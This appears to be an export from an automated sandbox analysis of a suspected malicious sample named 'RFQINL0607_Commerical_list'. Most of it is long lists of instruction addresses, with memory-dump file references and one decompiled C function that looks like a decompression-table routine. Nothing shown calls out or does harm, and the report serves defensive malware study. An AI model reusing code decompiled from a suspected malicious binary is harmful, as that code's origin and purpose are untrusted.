                                                                                                                                                                                  0x0040648a
                                                                                                                                                                                  0x0040648d
                                                                                                                                                                                  0x0040648f
                                                                                                                                                                                  0x0040648f
                                                                                                                                                                                  0x00406492
                                                                                                                                                                                  0x00406495
                                                                                                                                                                                  0x00406497
                                                                                                                                                                                  0x00406499
                                                                                                                                                                                  0x0040649b
                                                                                                                                                                                  0x0040649b
                                                                                                                                                                                  0x004064a4
                                                                                                                                                                                  0x004064a9
                                                                                                                                                                                  0x004064ac
                                                                                                                                                                                  0x004064af
                                                                                                                                                                                  0x004064b2
                                                                                                                                                                                  0x004064b5
                                                                                                                                                                                  0x004064b5
                                                                                                                                                                                  0x004064b5
                                                                                                                                                                                  0x004064b8
                                                                                                                                                                                  0x004064be
                                                                                                                                                                                  0x004064be
                                                                                                                                                                                  0x004064c4
                                                                                                                                                                                  0x004064c4
                                                                                                                                                                                  0x004064c4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004064b8
                                                                                                                                                                                  0x004063f2
                                                                                                                                                                                  0x004063f2
                                                                                                                                                                                  0x004063f8
                                                                                                                                                                                  0x004063fb
                                                                                                                                                                                  0x004063fd
                                                                                                                                                                                  0x00406428
                                                                                                                                                                                  0x0040642b
                                                                                                                                                                                  0x00406431
                                                                                                                                                                                  0x00406436
                                                                                                                                                                                  0x0040643c
                                                                                                                                                                                  0x00406442
                                                                                                                                                                                  0x00406444
                                                                                                                                                                                  0x00406447
                                                                                                                                                                                  0x00406450
                                                                                                                                                                                  0x00406456
                                                                                                                                                                                  0x00406456
                                                                                                                                                                                  0x00406449
                                                                                                                                                                                  0x0040644b
                                                                                                                                                                                  0x0040644d
                                                                                                                                                                                  0x0040644d
                                                                                                                                                                                  0x00406458
                                                                                                                                                                                  0x0040645e
                                                                                                                                                                                  0x00406461
                                                                                                                                                                                  0x00406463
                                                                                                                                                                                  0x00406465
                                                                                                                                                                                  0x0040646b
                                                                                                                                                                                  0x0040646d
                                                                                                                                                                                  0x0040646f
                                                                                                                                                                                  0x00406472
                                                                                                                                                                                  0x0040647b
                                                                                                                                                                                  0x0040647b
                                                                                                                                                                                  0x0040647d
                                                                                                                                                                                  0x00406474
                                                                                                                                                                                  0x00406474
                                                                                                                                                                                  0x00406477
                                                                                                                                                                                  0x00406477
                                                                                                                                                                                  0x0040647f
                                                                                                                                                                                  0x0040647f
                                                                                                                                                                                  0x0040646d
                                                                                                                                                                                  0x00406482
                                                                                                                                                                                  0x00406484
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406484
                                                                                                                                                                                  0x004063ff
                                                                                                                                                                                  0x004063ff
                                                                                                                                                                                  0x00406405
                                                                                                                                                                                  0x0040640b
                                                                                                                                                                                  0x0040640d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040640f
                                                                                                                                                                                  0x0040640f
                                                                                                                                                                                  0x00406411
                                                                                                                                                                                  0x00406413
                                                                                                                                                                                  0x00406416
                                                                                                                                                                                  0x0040641d
                                                                                                                                                                                  0x0040641d
                                                                                                                                                                                  0x0040641f
                                                                                                                                                                                  0x00406418
                                                                                                                                                                                  0x00406418
                                                                                                                                                                                  0x0040641a
                                                                                                                                                                                  0x0040641a
                                                                                                                                                                                  0x00406421
                                                                                                                                                                                  0x00406423
                                                                                                                                                                                  0x00406426
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040652a
                                                                                                                                                                                  0x0040652d
                                                                                                                                                                                  0x00406530
                                                                                                                                                                                  0x00406536
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040670d
                                                                                                                                                                                  0x0040670d
                                                                                                                                                                                  0x0040670d
                                                                                                                                                                                  0x00406710
                                                                                                                                                                                  0x00406713
                                                                                                                                                                                  0x00406715
                                                                                                                                                                                  0x00406718
                                                                                                                                                                                  0x0040671e
                                                                                                                                                                                  0x00406725
                                                                                                                                                                                  0x00406727
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004065fb
                                                                                                                                                                                  0x004065fb
                                                                                                                                                                                  0x00406623
                                                                                                                                                                                  0x00406623
                                                                                                                                                                                  0x00406623
                                                                                                                                                                                  0x00406625
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406603
                                                                                                                                                                                  0x00406603
                                                                                                                                                                                  0x00406607
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040660d
                                                                                                                                                                                  0x0040660d
                                                                                                                                                                                  0x00406610
                                                                                                                                                                                  0x00406613
                                                                                                                                                                                  0x00406616
                                                                                                                                                                                  0x00406618
                                                                                                                                                                                  0x0040661a
                                                                                                                                                                                  0x0040661d
                                                                                                                                                                                  0x00406620
                                                                                                                                                                                  0x00406620
                                                                                                                                                                                  0x00406620
                                                                                                                                                                                  0x00406627
                                                                                                                                                                                  0x00406627
                                                                                                                                                                                  0x0040662f
                                                                                                                                                                                  0x00406632
                                                                                                                                                                                  0x00406638
                                                                                                                                                                                  0x0040663b
                                                                                                                                                                                  0x0040663f
                                                                                                                                                                                  0x00406643
                                                                                                                                                                                  0x00406646
                                                                                                                                                                                  0x00406649
                                                                                                                                                                                  0x00406661
                                                                                                                                                                                  0x00406661
                                                                                                                                                                                  0x00406664
                                                                                                                                                                                  0x00406672
                                                                                                                                                                                  0x00406675
                                                                                                                                                                                  0x00406666
                                                                                                                                                                                  0x00406666
                                                                                                                                                                                  0x00406668
                                                                                                                                                                                  0x0040666f
                                                                                                                                                                                  0x0040666f
                                                                                                                                                                                  0x0040669e
                                                                                                                                                                                  0x0040669e
                                                                                                                                                                                  0x0040669e
                                                                                                                                                                                  0x004066a1
                                                                                                                                                                                  0x004066a3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040667e
                                                                                                                                                                                  0x0040667e
                                                                                                                                                                                  0x00406682
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406688
                                                                                                                                                                                  0x00406688
                                                                                                                                                                                  0x0040668b
                                                                                                                                                                                  0x0040668e
                                                                                                                                                                                  0x00406691
                                                                                                                                                                                  0x00406693
                                                                                                                                                                                  0x00406695
                                                                                                                                                                                  0x00406698
                                                                                                                                                                                  0x0040669b
                                                                                                                                                                                  0x0040669b
                                                                                                                                                                                  0x0040669b
                                                                                                                                                                                  0x004066a5
                                                                                                                                                                                  0x004066a5
                                                                                                                                                                                  0x004066a7
                                                                                                                                                                                  0x004066a9
                                                                                                                                                                                  0x004066b4
                                                                                                                                                                                  0x004066b7
                                                                                                                                                                                  0x004066ba
                                                                                                                                                                                  0x004066bc
                                                                                                                                                                                  0x004066be
                                                                                                                                                                                  0x004066c0
                                                                                                                                                                                  0x004066c3
                                                                                                                                                                                  0x004066c6
                                                                                                                                                                                  0x004066cb
                                                                                                                                                                                  0x004066ce
                                                                                                                                                                                  0x004066d1
                                                                                                                                                                                  0x004066d4
                                                                                                                                                                                  0x004066db
                                                                                                                                                                                  0x004066de
                                                                                                                                                                                  0x004066e0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004066e6
                                                                                                                                                                                  0x004066e6
                                                                                                                                                                                  0x004066ea
                                                                                                                                                                                  0x004066fb
                                                                                                                                                                                  0x004066fb
                                                                                                                                                                                  0x004066fb
                                                                                                                                                                                  0x004066fd
                                                                                                                                                                                  0x004066fd
                                                                                                                                                                                  0x00406701
                                                                                                                                                                                  0x00406701
                                                                                                                                                                                  0x00406701
                                                                                                                                                                                  0x00406703
                                                                                                                                                                                  0x00406704
                                                                                                                                                                                  0x00406707
                                                                                                                                                                                  0x00406707
                                                                                                                                                                                  0x00406707
                                                                                                                                                                                  0x0040670a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040670a
                                                                                                                                                                                  0x004066ec
                                                                                                                                                                                  0x004066ec
                                                                                                                                                                                  0x004066ef
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004066f5
                                                                                                                                                                                  0x004066f5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004066f5
                                                                                                                                                                                  0x0040664b
                                                                                                                                                                                  0x0040664b
                                                                                                                                                                                  0x0040664d
                                                                                                                                                                                  0x0040664f
                                                                                                                                                                                  0x00406652
                                                                                                                                                                                  0x00406655
                                                                                                                                                                                  0x00406659
                                                                                                                                                                                  0x00406659
                                                                                                                                                                                  0x0040672d
                                                                                                                                                                                  0x0040672d
                                                                                                                                                                                  0x00406730
                                                                                                                                                                                  0x00406737
                                                                                                                                                                                  0x0040673b
                                                                                                                                                                                  0x0040673d
                                                                                                                                                                                  0x00406740
                                                                                                                                                                                  0x00406743
                                                                                                                                                                                  0x00406748
                                                                                                                                                                                  0x0040674b
                                                                                                                                                                                  0x0040674d
                                                                                                                                                                                  0x0040674e
                                                                                                                                                                                  0x00406751
                                                                                                                                                                                  0x0040675c
                                                                                                                                                                                  0x0040675f
                                                                                                                                                                                  0x00406776
                                                                                                                                                                                  0x0040677b
                                                                                                                                                                                  0x00406782
                                                                                                                                                                                  0x00406787
                                                                                                                                                                                  0x0040678b
                                                                                                                                                                                  0x0040678d
                                                                                                                                                                                  0x0040678d
                                                                                                                                                                                  0x0040678d
                                                                                                                                                                                  0x00406790
                                                                                                                                                                                  0x00406792
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406798
                                                                                                                                                                                  0x00406798
                                                                                                                                                                                  0x0040679c
                                                                                                                                                                                  0x004067a7
                                                                                                                                                                                  0x004067ba
                                                                                                                                                                                  0x004067bf
                                                                                                                                                                                  0x004067c4
                                                                                                                                                                                  0x004067c6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004067cc
                                                                                                                                                                                  0x004067cc
                                                                                                                                                                                  0x004067cf
                                                                                                                                                                                  0x004067d1
                                                                                                                                                                                  0x004067df
                                                                                                                                                                                  0x004067df
                                                                                                                                                                                  0x004067e2
                                                                                                                                                                                  0x004067e2
                                                                                                                                                                                  0x004067e5
                                                                                                                                                                                  0x004067e8
                                                                                                                                                                                  0x004067eb
                                                                                                                                                                                  0x004067ee
                                                                                                                                                                                  0x004067f1
                                                                                                                                                                                  0x004067f4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004067f4
                                                                                                                                                                                  0x004067d3
                                                                                                                                                                                  0x004067d3
                                                                                                                                                                                  0x004067d9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004067d9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406b78
                                                                                                                                                                                  0x00406b78
                                                                                                                                                                                  0x00406b7e
                                                                                                                                                                                  0x00406b84
                                                                                                                                                                                  0x00406b89
                                                                                                                                                                                  0x00406b8f
                                                                                                                                                                                  0x00406b95
                                                                                                                                                                                  0x00406b97
                                                                                                                                                                                  0x00406b9a
                                                                                                                                                                                  0x00406ba3
                                                                                                                                                                                  0x00406ba9
                                                                                                                                                                                  0x00406ba9
                                                                                                                                                                                  0x00406b9c
                                                                                                                                                                                  0x00406b9e
                                                                                                                                                                                  0x00406ba0
                                                                                                                                                                                  0x00406ba0
                                                                                                                                                                                  0x00406bab
                                                                                                                                                                                  0x00406bad
                                                                                                                                                                                  0x00406bb0
                                                                                                                                                                                  0x00406beb
                                                                                                                                                                                  0x00406beb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406bb2
                                                                                                                                                                                  0x00406bb2
                                                                                                                                                                                  0x00406bb2
                                                                                                                                                                                  0x00406bb8
                                                                                                                                                                                  0x00406bbb
                                                                                                                                                                                  0x00406bbd
                                                                                                                                                                                  0x00406bf2
                                                                                                                                                                                  0x00406bf4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406bf4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406bbd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004061fc
                                                                                                                                                                                  0x00406bca
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406bca
                                                                                                                                                                                  0x004065de
                                                                                                                                                                                  0x004065e0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004065e2
                                                                                                                                                                                  0x004065e2
                                                                                                                                                                                  0x004065e5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004065e5
                                                                                                                                                                                  0x0040652a
                                                                                                                                                                                  0x004064eb
                                                                                                                                                                                  0x00406bcf
                                                                                                                                                                                  0x00406bd2
                                                                                                                                                                                  0x00406bd4
                                                                                                                                                                                  0x00406bdd
                                                                                                                                                                                  0x00406be3
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                                                                                                                  • Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
                                                                                                                                                                                  • Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00406CA2 Relevance: .3, Instructions: 300COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00406CA2(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42c680 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42c680;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42c680 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                                                                                                                  0x00406cad
                                                                                                                                                                                  0x00406cb5
                                                                                                                                                                                  0x00406cb9
                                                                                                                                                                                  0x00406cbb
                                                                                                                                                                                  0x00406cbe
                                                                                                                                                                                  0x00406cc0
                                                                                                                                                                                  0x00406cc0
                                                                                                                                                                                  0x00406cc2
                                                                                                                                                                                  0x00406cc9
                                                                                                                                                                                  0x00406ccb
                                                                                                                                                                                  0x00406ccb
                                                                                                                                                                                  0x00406cd1
                                                                                                                                                                                  0x00406ce6
                                                                                                                                                                                  0x00406cee
                                                                                                                                                                                  0x00406cf0
                                                                                                                                                                                  0x00406cf2
                                                                                                                                                                                  0x00406cf5
                                                                                                                                                                                  0x00406cf6
                                                                                                                                                                                  0x00406cf6
                                                                                                                                                                                  0x00406cfc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406cfe
                                                                                                                                                                                  0x00406d01
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406d01
                                                                                                                                                                                  0x00406d05
                                                                                                                                                                                  0x00406d08
                                                                                                                                                                                  0x00406d0a
                                                                                                                                                                                  0x00406d0a
                                                                                                                                                                                  0x00406d0d
                                                                                                                                                                                  0x00406d13
                                                                                                                                                                                  0x00406d14
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406d14
                                                                                                                                                                                  0x00406d19
                                                                                                                                                                                  0x00406d1c
                                                                                                                                                                                  0x00406d1e
                                                                                                                                                                                  0x00406d1e
                                                                                                                                                                                  0x00406d24
                                                                                                                                                                                  0x00406d26
                                                                                                                                                                                  0x00406d37
                                                                                                                                                                                  0x00406d2a
                                                                                                                                                                                  0x00406d2e
                                                                                                                                                                                  0x00406fd3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406fd3
                                                                                                                                                                                  0x00406d34
                                                                                                                                                                                  0x00406d35
                                                                                                                                                                                  0x00406d35
                                                                                                                                                                                  0x00406d3d
                                                                                                                                                                                  0x00406d40
                                                                                                                                                                                  0x00406d44
                                                                                                                                                                                  0x00406d46
                                                                                                                                                                                  0x00406d48
                                                                                                                                                                                  0x00406d4b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406d53
                                                                                                                                                                                  0x00406d59
                                                                                                                                                                                  0x00406d5b
                                                                                                                                                                                  0x00406d5d
                                                                                                                                                                                  0x00406d5e
                                                                                                                                                                                  0x00406d73
                                                                                                                                                                                  0x00406d73
                                                                                                                                                                                  0x00406d76
                                                                                                                                                                                  0x00406d78
                                                                                                                                                                                  0x00406d78
                                                                                                                                                                                  0x00406d7a
                                                                                                                                                                                  0x00406d7f
                                                                                                                                                                                  0x00406d81
                                                                                                                                                                                  0x00406d88
                                                                                                                                                                                  0x00406d8a
                                                                                                                                                                                  0x00406d92
                                                                                                                                                                                  0x00406d92
                                                                                                                                                                                  0x00406d94
                                                                                                                                                                                  0x00406d95
                                                                                                                                                                                  0x00406da4
                                                                                                                                                                                  0x00406da8
                                                                                                                                                                                  0x00406dac
                                                                                                                                                                                  0x00406daf
                                                                                                                                                                                  0x00406db2
                                                                                                                                                                                  0x00406db7
                                                                                                                                                                                  0x00406dba
                                                                                                                                                                                  0x00406dc0
                                                                                                                                                                                  0x00406dc7
                                                                                                                                                                                  0x00406dcd
                                                                                                                                                                                  0x00406fc6
                                                                                                                                                                                  0x00406fc6
                                                                                                                                                                                  0x00406fcb
                                                                                                                                                                                  0x00406fda
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406fcb
                                                                                                                                                                                  0x00406dda
                                                                                                                                                                                  0x00406ddd
                                                                                                                                                                                  0x00406de0
                                                                                                                                                                                  0x00406de3
                                                                                                                                                                                  0x00406de7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406df2
                                                                                                                                                                                  0x00406df5
                                                                                                                                                                                  0x00406df6
                                                                                                                                                                                  0x00406df8
                                                                                                                                                                                  0x00406dfe
                                                                                                                                                                                  0x00406e01
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406e07
                                                                                                                                                                                  0x00406e08
                                                                                                                                                                                  0x00406e0b
                                                                                                                                                                                  0x00406e0e
                                                                                                                                                                                  0x00406e11
                                                                                                                                                                                  0x00406e17
                                                                                                                                                                                  0x00406e19
                                                                                                                                                                                  0x00406e19
                                                                                                                                                                                  0x00406e21
                                                                                                                                                                                  0x00406e25
                                                                                                                                                                                  0x00406e2a
                                                                                                                                                                                  0x00406e4f
                                                                                                                                                                                  0x00406e55
                                                                                                                                                                                  0x00406e57
                                                                                                                                                                                  0x00406e59
                                                                                                                                                                                  0x00406e5c
                                                                                                                                                                                  0x00406e65
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406e2c
                                                                                                                                                                                  0x00406e2c
                                                                                                                                                                                  0x00406e35
                                                                                                                                                                                  0x00406e39
                                                                                                                                                                                  0x00000000
